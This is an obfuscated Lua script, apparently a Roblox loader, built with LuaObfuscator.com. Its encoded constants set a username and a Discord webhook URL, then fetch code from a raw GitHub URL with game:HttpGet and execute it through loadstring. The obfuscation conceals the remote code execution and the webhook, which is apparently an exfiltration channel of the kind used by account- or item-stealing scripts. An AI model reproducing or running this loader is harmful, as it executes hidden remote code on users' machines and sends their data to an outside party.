--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((1432 -(282 + 595)) + 64)))) + 1)) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=0;local v84;while true do if (v83==(568 -(367 + 201))) then v84=2^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or ((1637 -(1523 + 114)) + 0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1273 -(226 + 1044)) );v19=v19 + (5 -1) ;return (v37 * ((16778290 -(892 + 65)) -(32 + 85))) + (v36 * (64226 + 1310)) + (v35 * (1321 -((162 -94) + 997))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==3) then v45=nil;while true do local v90=0;while true do if (v90==1) then if (v39==(603 -(268 + 335))) then local v107=0;while true do if (v107~=(1376 -(729 + 645))) then else v39=573 -(426 + 146) ;break;end if (v107~=(393 -(232 + 160))) then else v42={};v43={v40,v41,nil,v42};v107=5 -3 ;end if ((0 -0)==v107) then v40={};v41={};v107=3 -2 ;end end end break;end if (v90==(0 -0)) then if (v39==(1 + 0)) then v44=v24();v45={};for v110=1 -0 ,v44 do local v111=0 + 0 ;local v112;local v113;local v114;local v115;while true do if (v111~=(1475 -(1329 + 145))) then else v114=nil;v115=nil;v111=2;end if (v111==0) then v112=0;v113=nil;v111=1 + 0 ;end if (v111~=(702 -(271 + 429))) then else while true do if (v112~=0) then else local v144=0;local v145;while true do if (0==v144) then v145=0 + 0 ;while true do if (v145==(972 -(140 + 831))) then v112=1;break;end if (v145==(1850 -(1409 + 441))) then local v153=718 -(15 + 703) ;while true do if (v153~=(1288 -(993 + 295))) then else v113=0 + 0 ;v114=nil;v153=1 + 0 ;end if ((439 -(262 + 176))~=v153) then else v145=1722 -(345 + 1376) ;break;end end end end break;end end end if (v112~=(689 -(198 + 490))) then else v115=nil;while true do if (v113~=(4 -3)) then else if (v114==(2 -1)) then v115=v22()~=0 ;elseif (v114==(1 + 1)) then v115=v25();elseif (v114~=(1209 -(696 + 510))) then else v115=v26();end v45[v110]=v115;break;end if ((0 -0)==v113) then local v147=1262 -(1091 + 171) ;while true do if (v147~=(529 -(406 + 123))) then else local v154=0 + 0 ;while true do if ((3 -2)~=v154) then else v147=1;break;end if (v154==(1322 -(1249 + 73))) then v114=v22();v115=nil;v154=3 -2 ;end end end if ((375 -(123 + 251))==v147) then v113=1146 -(466 + 679) ;break;end end end end break;end end break;end end end v43[14 -11 ]=v22();v39=2;end if (v39==(4 -2)) then local v109=0;while true do if (v109==(699 -(208 + 490))) then return v43;end if (v109==0) then for v136=1 + 0 ,v24() do local v137=1900 -(106 + 1794) ;local v138;local v139;while true do if (v137==(1 + 0)) then while true do if (v138==(0 + 0)) then v139=v22();if (v21(v139,1 + 0 ,837 -(660 + 176) )~=(0 + 0)) then else local v148=0;local v149;local v150;local v151;local v152;while true do if (v148~=(203 -(14 + 188))) then else local v155=675 -(534 + 141) ;local v156;while true do if (v155~=(584 -(57 + 527))) then else v156=0 + 0 ;while true do if (v156==1) then v148=2 + 0 ;break;end if (v156==0) then local v167=0 + 0 ;while true do if ((0 -0)~=v167) then else v151=nil;v152=nil;v167=1;end if (v167==(1 + 0)) then v156=1 -0 ;break;end end end end break;end end end if (v148==(5 -3)) then while true do if ((168 -(122 + 44))==v149) then local v159=0;local v160;while true do if (v159~=0) then else v160=0 -0 ;while true do if (v160~=(1 -0)) then else v149=8 -5 ;break;end if (v160~=(0 + 0)) then else if (v21(v151,1 + 0 ,1 + 0 )~=(1 + 0)) then else v152[398 -(115 + 281) ]=v45[v152[2]];end if (v21(v151,67 -(30 + 35) ,2 + 0 )~=(1258 -(1043 + 214))) then else v152[3]=v45[v152[6 -3 ]];end v160=1 + 0 ;end end break;end end end if (v149~=(7 -4)) then else if (v21(v151,10 -7 ,870 -(550 + 317) )==(2 -1)) then v152[4]=v45[v152[4]];end v40[v136]=v152;break;end if (v149~=0) then else local v162=0 -0 ;while true do if (0~=v162) then else v150=v21(v139,582 -(361 + 219) ,3);v151=v21(v139,4,6);v162=1;end if (1==v162) then v149=1 -0 ;break;end end end if (v149==(2 -1)) then local v163=285 -(134 + 151) ;local v164;while true do if (v163==(413 -(15 + 398))) then v164=1665 -(970 + 695) ;while true do if ((983 -(18 + 964))==v164) then v149=2;break;end if (v164~=0) then else local v169=0 -0 ;while true do if (v169~=(1 -0)) then else v164=1 + 0 ;break;end if (v169~=0) then else local v174=1990 -(582 + 1408) ;while true do if (v174==(3 -2)) then v169=1 -0 ;break;end if (v174==(0 -0)) then v152={v23(),v23(),nil,nil};if (v150==0) then local v175=0 + 0 ;local v176;local v177;while true do if (v175==(780 -(162 + 618))) then v176=0 + 0 ;v177=nil;v175=2 -1 ;end if (v175~=1) then else while true do if (v176~=0) then else v177=1551 -(1126 + 425) ;while true do if (v177==(405 -(118 + 287))) then v152[2 + 1 ]=v23();v152[1125 -(118 + 1003) ]=v23();break;end end break;end end break;end end elseif (v150==(1 -0)) then v152[3]=v24();elseif (v150==2) then v152[4 -1 ]=v24() -((5 -3)^(2 + 14)) ;elseif (v150~=(1639 -(1373 + 263))) then else local v180=1000 -(451 + 549) ;local v181;while true do if (v180~=(0 + 0)) then else v181=0 -0 ;while true do if (v181~=(0 -0)) then else v152[1387 -(746 + 638) ]=v24() -((1 + 1)^16) ;v152[5 -1 ]=v23();break;end end break;end end end v174=1;end end end end end end break;end end end end break;end if (v148==(341 -(218 + 123))) then local v157=1581 -(1535 + 46) ;local v158;while true do if (v157==(0 + 0)) then v158=0 + 0 ;while true do if (v158==(0 + 0)) then local v168=0 + 0 ;while true do if (0==v168) then v149=0;v150=nil;v168=1 + 0 ;end if (v168~=(2 -1)) then else v158=1 + 0 ;break;end end end if (v158==(561 -(306 + 254))) then v148=1;break;end end break;end end end end end break;end end break;end if (v137~=(0 -0)) then else v138=0;v139=nil;v137=1 + 0 ;end end end for v140=4 -3 ,v24() do v41[v140-(1 -0) ]=v29();end v109=1468 -(899 + 568) ;end end end v90=1 + 0 ;end end end break;end if (1~=v38) then else v41=nil;v42=nil;v38=2 + 0 ;end if (v38~=(1331 -(797 + 532))) then else v43=nil;v44=nil;v38=3;end if (v38==0) then v39=0;v40=nil;v38=2 -1 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1581 -(1183 + 397) ;local v49=(v21(v47,1,7 + 13 ) * ((4 -2)^(1234 -(373 + 829)))) + v46 ;local v50=v21(v47,21,762 -(476 + 255) );local v51=((v21(v47,1162 -(369 + 761) )==(1 + (0 -0))) and  -(1 -0)) or (1 -0) ;if (v50==0) then if (v49==(238 -(64 + 128 + 46))) then return v51 * (0 + 0 + (1975 -(1913 + 62))) ;else v50=1 -0 ;v48=336 -(144 + 192) ;end elseif (v50==(2263 -(42 + 174))) then return ((v49==(0 + 0)) and (v51 * ((1 + 0)/(0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-((1592 + 935) -(363 + 1141)) ) * (v48 + (v49/(2^52))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(1933 -(565 + 1368))) then return "";end end v53=v3(v16,v19,(v19 + v52) -1 );v19=v19 + v52 ;local v54={};for v66=2 -1 , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56=1661 -(1477 + 184) ;local v57;local v58;while true do if (v56==1) then return (v58 * (348 -92)) + v57 ;end if (v56==(0 + 0)) then v57,v58=v1(v16,v19,v19 + ((2585 -1727) -(564 + (596 -(244 + 60)))) );v19=v19 + 2 ;v56=(1 + 0) -(476 -(41 + 435)) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v59,1,1));return "";end end else local v86=v2(v0(v59,16));if v20 then local v91=v5(v86,v20);v20=nil;return v91;else return v86;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81==0) then local v96=v80[2];v78[v96]=v78[v96](v13(v78,v96 + 1 ,v73));else v78[v80[2]]();end elseif (v81<=2) then v78[v80[2]]=v80[3];elseif (v81>3) then local v116=v80[2];local v117,v118=v71(v78[v116](v13(v78,v116 + 1 ,v80[3])));v73=(v118 + v116) -1 ;local v119=0;for v134=v116,v73 do local v135=0;while true do if (v135==0) then v119=v119 + 1 ;v78[v134]=v117[v119];break;end end end else v78[v80[2]]=v62[v80[3]];end elseif (v81<=6) then if (v81==5) then local v100=v80[2];local v101=v78[v80[3]];v78[v100 + 1 ]=v101;v78[v100]=v101[v80[4]];else do return;end end elseif (v81<=7) then v62[v80[3]]=v78[v80[2]];elseif (v81>8) then v78[v80[2]]=v80[3]~=0 ;else local v123;local v124;v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v124=v80[2];v123=v78[v80[3]];v78[v124 + 1 ]=v123;v78[v124]=v123[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003083O00557365724E616D65030A3O005A3O6570657273343203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31353437313937322O3831323730373839322F76532O5F736C6F784C714536724C4F57764764354E4A486877784C5938337437417438635676323536464767387A424C784C39487A746C706E2O53475643735335687A6803093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012083O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0009000400014O0004000100049O0000022O00013O000100012O00063O00017O00",v9(),...);
